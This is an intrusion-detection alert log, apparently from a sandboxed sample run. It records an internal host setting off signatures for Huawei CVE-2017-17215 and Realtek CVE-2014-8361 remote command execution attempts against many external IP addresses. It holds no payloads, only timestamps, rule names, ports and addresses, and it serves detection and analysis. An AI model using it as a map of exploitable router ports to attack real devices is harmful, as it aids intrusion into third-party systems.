                                                07/20/24-23:05:36.325773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3342637215192.168.2.1441.0.19.209
                                                07/20/24-23:05:36.584864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575437215192.168.2.1441.138.65.24
                                                07/20/24-23:05:36.328888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4041637215192.168.2.1441.67.253.194
                                                07/20/24-23:05:59.358816TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5778852869192.168.2.14192.220.114.246
                                                07/20/24-23:07:03.833995TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615763252869192.168.2.1477.148.122.8
                                                07/20/24-23:07:04.503671TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25958652869192.168.2.14140.104.123.65
                                                07/20/24-23:05:33.830272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4987037215192.168.2.14181.89.181.103
                                                07/20/24-23:05:45.009825TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615292652869192.168.2.14150.141.141.200
                                                07/20/24-23:05:57.216313TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4051852869192.168.2.14137.58.252.249
                                                07/20/24-23:05:38.945198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6095837215192.168.2.1441.176.223.222
                                                07/20/24-23:05:59.058741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3391252869192.168.2.141.27.82.104
                                                07/20/24-23:05:39.047734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5682637215192.168.2.14197.71.84.187
                                                07/20/24-23:05:59.382234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4794852869192.168.2.1437.117.94.187
                                                07/20/24-23:06:23.120505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4132852869192.168.2.14162.18.159.65
                                                07/20/24-23:06:15.110617TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5139852869192.168.2.14100.227.82.127
                                                07/20/24-23:05:47.481216TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4356452869192.168.2.14123.146.160.118
                                                07/20/24-23:05:37.449834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5170652869192.168.2.14185.138.94.75
                                                07/20/24-23:05:45.376608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5654237215192.168.2.14157.181.75.164
                                                07/20/24-23:06:07.090929TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613916652869192.168.2.1427.75.248.44
                                                07/20/24-23:05:36.328888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5820837215192.168.2.14157.136.100.134
                                                07/20/24-23:06:01.285913TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3932652869192.168.2.1493.254.0.231
                                                07/20/24-23:06:05.290476TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5025852869192.168.2.14138.94.192.114
                                                07/20/24-23:07:07.493314TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25911452869192.168.2.14111.50.3.252
                                                07/20/24-23:05:56.159948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5530637215192.168.2.14158.254.116.74
                                                07/20/24-23:06:03.945487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5907237215192.168.2.1441.110.244.5
                                                07/20/24-23:05:40.413672TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25321052869192.168.2.1448.109.149.149
                                                07/20/24-23:06:00.018219TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613646652869192.168.2.14162.167.107.129
                                                07/20/24-23:06:28.937691TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6068052869192.168.2.1474.144.172.46
                                                07/20/24-23:06:01.391419TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614595852869192.168.2.14145.133.233.116
                                                07/20/24-23:05:37.462008TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23327452869192.168.2.14159.166.244.164
                                                07/20/24-23:05:50.554912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4905437215192.168.2.14197.205.96.85
                                                07/20/24-23:06:00.719355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606037215192.168.2.1441.124.13.9
                                                07/20/24-23:05:39.777436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5061837215192.168.2.14217.52.127.251
                                                07/20/24-23:05:39.916294TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615707252869192.168.2.14141.164.202.249
                                                07/20/24-23:06:07.071207TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615253252869192.168.2.14188.41.244.103
                                                07/20/24-23:05:34.661756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4334437215192.168.2.1441.75.56.150
                                                07/20/24-23:06:24.616747TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614978652869192.168.2.1460.62.84.161
                                                07/20/24-23:05:58.344973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4596652869192.168.2.14187.76.135.2
                                                07/20/24-23:05:57.179441TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25651652869192.168.2.14208.210.138.41
                                                07/20/24-23:06:02.701650TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24396652869192.168.2.14123.2.215.104
                                                07/20/24-23:05:50.528919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683637215192.168.2.1441.211.66.76
                                                07/20/24-23:05:57.034294TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5059852869192.168.2.1458.74.85.108
                                                07/20/24-23:05:33.831807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3381637215192.168.2.14157.55.227.62
                                                07/20/24-23:05:39.678174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469437215192.168.2.14157.122.105.116
                                                07/20/24-23:05:57.004582TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614971252869192.168.2.1431.186.230.47
                                                07/20/24-23:06:07.860442TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613547652869192.168.2.1499.157.115.85
                                                07/20/24-23:05:35.912455TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3494252869192.168.2.1438.130.134.142
                                                07/20/24-23:05:57.538013TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23686652869192.168.2.14209.32.8.160
                                                07/20/24-23:05:57.460717TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3803852869192.168.2.14222.83.92.112
                                                07/20/24-23:05:56.048573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852637215192.168.2.14157.84.136.93
                                                07/20/24-23:05:42.221844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131037215192.168.2.14186.188.62.231
                                                07/20/24-23:06:00.781631TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4339452869192.168.2.14104.109.248.86
                                                07/20/24-23:07:04.461996TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613532852869192.168.2.1492.148.201.172
                                                07/20/24-23:05:38.153509TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614527052869192.168.2.14114.248.97.56
                                                07/20/24-23:06:01.593709TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613953452869192.168.2.14198.58.66.130
                                                07/20/24-23:05:58.787162TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24501452869192.168.2.14170.88.190.122
                                                07/20/24-23:06:27.421231TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3419052869192.168.2.1431.100.120.188
                                                07/20/24-23:06:17.581336TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615246652869192.168.2.14206.154.165.136
                                                07/20/24-23:06:00.171719TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613454852869192.168.2.1478.127.105.181
                                                07/20/24-23:06:15.236295TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5866852869192.168.2.14191.54.159.112
                                                07/20/24-23:06:03.476247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6050437215192.168.2.14111.147.17.210
                                                07/20/24-23:06:22.140723TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4076852869192.168.2.14219.131.134.237
                                                07/20/24-23:06:22.925505TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616080852869192.168.2.14200.157.116.174
                                                07/20/24-23:05:56.079797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5660037215192.168.2.1446.243.83.236
                                                07/20/24-23:05:59.204161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3734452869192.168.2.14160.105.28.66
                                                07/20/24-23:05:36.328639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5769437215192.168.2.1441.17.25.124
                                                07/20/24-23:05:47.014311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437437215192.168.2.14197.54.68.56
                                                07/20/24-23:05:52.546679TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24127252869192.168.2.14138.44.159.137
                                                07/20/24-23:05:35.202217TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4287452869192.168.2.14174.38.108.83
                                                07/20/24-23:06:02.063033TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3890252869192.168.2.14139.247.75.28
                                                07/20/24-23:06:00.145339TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3659252869192.168.2.14148.192.90.183
                                                07/20/24-23:05:48.244983TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4603452869192.168.2.1425.15.58.154
                                                07/20/24-23:05:57.939285TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613632052869192.168.2.1497.170.235.212
                                                07/20/24-23:06:07.406980TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613695852869192.168.2.1487.139.214.58
                                                07/20/24-23:05:39.756595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348237215192.168.2.14197.77.80.96
                                                07/20/24-23:05:48.841499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6053837215192.168.2.14197.153.228.83
                                                07/20/24-23:05:52.527430TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25944052869192.168.2.1444.15.121.137
                                                07/20/24-23:05:44.951018TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614213052869192.168.2.14222.57.120.201
                                                07/20/24-23:05:56.972496TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4527252869192.168.2.1444.81.94.227
                                                07/20/24-23:05:34.662485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4896037215192.168.2.14157.182.60.47
                                                07/20/24-23:05:45.130220TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615453452869192.168.2.1499.220.189.230
                                                07/20/24-23:06:15.236295TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4913252869192.168.2.1437.117.94.187
                                                07/20/24-23:05:57.214918TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613296852869192.168.2.14204.159.132.238
                                                07/20/24-23:05:38.957923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5224237215192.168.2.1441.201.61.250
                                                07/20/24-23:05:58.899974TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23808252869192.168.2.1446.189.159.251
                                                07/20/24-23:06:00.947824TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615756852869192.168.2.14104.64.121.105
                                                07/20/24-23:05:35.292228TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614367452869192.168.2.1498.74.12.225
                                                07/20/24-23:05:58.378138TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24095652869192.168.2.14210.62.250.25
                                                07/20/24-23:06:00.022949TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614800252869192.168.2.14125.212.164.174
                                                07/20/24-23:05:35.782996TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614216852869192.168.2.141.23.28.195
                                                07/20/24-23:05:39.517577TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5069052869192.168.2.14117.40.50.228
                                                07/20/24-23:05:34.656192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5600237215192.168.2.14157.155.131.147
                                                07/20/24-23:05:57.334876TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3924052869192.168.2.14164.251.213.254
                                                07/20/24-23:06:00.006350TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4930052869192.168.2.1467.83.53.203
                                                07/20/24-23:06:31.001861TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616043452869192.168.2.1471.158.18.236
                                                07/20/24-23:06:39.471724TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25843852869192.168.2.14150.193.47.116
                                                07/20/24-23:05:37.489725TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4907652869192.168.2.14202.183.171.29
                                                07/20/24-23:05:40.407056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5409252869192.168.2.14116.197.2.184
                                                07/20/24-23:05:45.386529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492637215192.168.2.1441.222.249.94
                                                07/20/24-23:06:01.824929TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3719652869192.168.2.1499.157.115.85
                                                07/20/24-23:06:00.933404TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613658252869192.168.2.14111.105.141.17
                                                07/20/24-23:05:34.625646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3938437215192.168.2.14170.233.211.253
                                                07/20/24-23:05:57.525433TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3658652869192.168.2.141.173.175.109
                                                07/20/24-23:05:56.454514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3769237215192.168.2.14197.169.208.157
                                                07/20/24-23:05:36.325897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3841037215192.168.2.14157.135.248.171
                                                07/20/24-23:06:07.408178TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25057852869192.168.2.14218.24.116.194
                                                07/20/24-23:05:33.860838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732237215192.168.2.14176.171.193.242
                                                07/20/24-23:05:46.406047TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5607052869192.168.2.14113.82.161.254
                                                07/20/24-23:06:02.427717TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615972852869192.168.2.1457.97.23.2
                                                07/20/24-23:05:57.478181TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615686052869192.168.2.1490.174.188.55
                                                07/20/24-23:06:24.605729TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6063052869192.168.2.14101.241.213.40
                                                07/20/24-23:05:35.241442TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5443452869192.168.2.14162.190.144.241
                                                07/20/24-23:05:36.339999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5478037215192.168.2.14131.26.31.236
                                                07/20/24-23:05:35.310648TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3535652869192.168.2.14184.126.92.19
                                                07/20/24-23:06:02.872548TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4112452869192.168.2.14143.185.187.241
                                                07/20/24-23:06:03.136885TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4114652869192.168.2.14143.185.187.241
                                                07/20/24-23:05:35.489677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5758252869192.168.2.14119.225.48.58
                                                07/20/24-23:06:03.297548TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615360052869192.168.2.1448.138.205.15
                                                07/20/24-23:07:08.490661TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4206252869192.168.2.1484.62.152.144
                                                07/20/24-23:06:34.148721TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613869052869192.168.2.14125.239.95.227
                                                07/20/24-23:05:42.180899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3919037215192.168.2.14190.85.212.40
                                                07/20/24-23:05:34.657262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854837215192.168.2.1441.145.104.135
                                                07/20/24-23:05:57.164358TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615323852869192.168.2.1432.217.101.126
                                                07/20/24-23:06:01.224583TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5682452869192.168.2.14192.90.118.17
                                                07/20/24-23:05:48.041200TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614350452869192.168.2.1439.123.223.174
                                                07/20/24-23:05:36.040620TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613436452869192.168.2.14172.126.0.115
                                                07/20/24-23:05:37.527690TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5829652869192.168.2.14212.160.183.244
                                                07/20/24-23:05:52.728679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3660252869192.168.2.1431.251.184.113
                                                07/20/24-23:05:57.442188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4755052869192.168.2.1484.100.131.64
                                                07/20/24-23:05:45.403074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4561037215192.168.2.1441.16.89.154
                                                07/20/24-23:05:37.542288TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23659252869192.168.2.14162.47.82.104
                                                07/20/24-23:05:57.109755TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24051852869192.168.2.14201.191.195.148
                                                07/20/24-23:05:59.208138TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615308252869192.168.2.1478.100.44.178
                                                07/20/24-23:05:34.659618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5594237215192.168.2.1441.141.203.96
                                                07/20/24-23:05:48.047034TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3539452869192.168.2.14125.215.149.55
                                                07/20/24-23:05:50.555898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565437215192.168.2.14157.92.108.181
                                                07/20/24-23:05:57.797060TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613758452869192.168.2.14100.254.105.120
                                                07/20/24-23:06:13.620376TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614727452869192.168.2.1497.106.240.203
                                                07/20/24-23:05:52.526129TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4996852869192.168.2.14130.125.245.169
                                                07/20/24-23:05:38.808944TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613655852869192.168.2.14105.239.125.24
                                                07/20/24-23:05:36.067351TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614773652869192.168.2.1437.154.117.198
                                                07/20/24-23:06:08.628127TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613861052869192.168.2.14184.148.131.220
                                                07/20/24-23:05:38.949221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3603237215192.168.2.14197.93.226.135
                                                07/20/24-23:06:25.391346TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4367252869192.168.2.1432.33.117.34
                                                07/20/24-23:07:07.633025TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5630852869192.168.2.14120.21.248.106
                                                07/20/24-23:06:27.692046TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613741452869192.168.2.14144.116.63.138
                                                07/20/24-23:05:37.464931TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3770252869192.168.2.14203.171.109.95
                                                07/20/24-23:05:38.939890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5904837215192.168.2.14158.191.230.234
                                                07/20/24-23:06:15.005197TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615722252869192.168.2.14216.122.26.226
                                                07/20/24-23:05:34.657123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618037215192.168.2.14157.131.171.170
                                                07/20/24-23:05:44.337765TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5905252869192.168.2.14120.138.189.24
                                                07/20/24-23:06:01.465127TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24358252869192.168.2.14164.43.30.66
                                                07/20/24-23:05:57.804757TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3698452869192.168.2.14210.180.35.0
                                                07/20/24-23:05:57.702462TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5751052869192.168.2.1418.206.106.65
                                                07/20/24-23:06:05.627003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5215052869192.168.2.1419.252.110.104
                                                07/20/24-23:05:52.468125TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4051452869192.168.2.1475.112.155.168
                                                07/20/24-23:05:40.461168TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24289252869192.168.2.1436.106.161.161
                                                07/20/24-23:05:34.622534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494237215192.168.2.14180.149.134.73
                                                07/20/24-23:07:03.257276TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3566852869192.168.2.1434.212.103.117
                                                07/20/24-23:05:57.062143TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23961452869192.168.2.14159.241.80.83
                                                07/20/24-23:05:37.445004TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25621452869192.168.2.14138.71.112.70
                                                07/20/24-23:06:11.301636TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615375252869192.168.2.14207.238.106.184
                                                07/20/24-23:05:42.134564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5613837215192.168.2.1444.215.66.206
                                                07/20/24-23:06:09.557113TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3863252869192.168.2.14201.226.14.177
                                                07/20/24-23:06:25.985417TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4504252869192.168.2.14101.143.94.90
                                                07/20/24-23:05:39.060021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695437215192.168.2.1441.133.210.120
                                                07/20/24-23:05:52.515827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5883052869192.168.2.14139.162.45.48
                                                07/20/24-23:05:45.101716TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614615052869192.168.2.14126.160.124.198
                                                07/20/24-23:05:59.290948TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615340852869192.168.2.14145.209.73.208
                                                07/20/24-23:05:38.478783TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613420252869192.168.2.1412.103.8.219
                                                07/20/24-23:05:38.951134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109237215192.168.2.14201.240.134.48
                                                07/20/24-23:06:17.501695TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5935052869192.168.2.1469.227.93.244
                                                07/20/24-23:05:39.301436TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3673252869192.168.2.14108.93.153.171
                                                07/20/24-23:05:59.915135TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616079652869192.168.2.1497.122.27.131
                                                07/20/24-23:06:08.513489TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614103452869192.168.2.14199.168.202.86
                                                07/20/24-23:05:45.403579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823237215192.168.2.1441.172.130.86
                                                07/20/24-23:06:18.744447TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3540252869192.168.2.14153.95.32.34
